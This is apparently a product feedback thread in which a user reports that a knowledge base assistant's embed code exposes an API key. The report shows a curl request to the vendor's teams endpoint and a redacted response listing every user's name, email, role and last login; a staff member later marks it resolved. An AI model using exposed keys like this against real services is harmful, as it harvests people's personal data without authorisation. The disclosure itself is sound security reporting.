Knowledge Base Assistant Permission Issues
complete
Tobias Moser
For the knowlege base assistant, you need to expose the api_key to end users (see your javascript embedd code). With this key, the users or attackers can download all user information.
Using this curl command…
curl --request GET "https://apihub.document360.io/v2/teams" --header "api_token: <your token>"
…the attacker got the following response of all document360 users:
{
"result": [
{
"user_id": "<your id>",
"first_name": "<first_name>",
"last_name": "<last_name>",
"email_id": "<email>",
"profile_logo_url": "<profile_logo>",
"portal_role": "<role>",
"last_login_at": "<last_login>"
},
],
"extension_data": null,
"context": null,
"success": true,
"errors": [],
"warnings": [],
"information": []
}
Log In
Thiru
The issue has been resolved. Kindly validate from your end as well.
Thiru
marked this post as
complete
Tobias Moser
What is the status off this? In my opinion this is a severe issue, which should raise your attention!
Mike Freeman
I had assumed that usage of the API key would be protected by setting up trusted domains in the 'Keep your assistant secure' section but maybe I am wrong or maybe it doesn't work.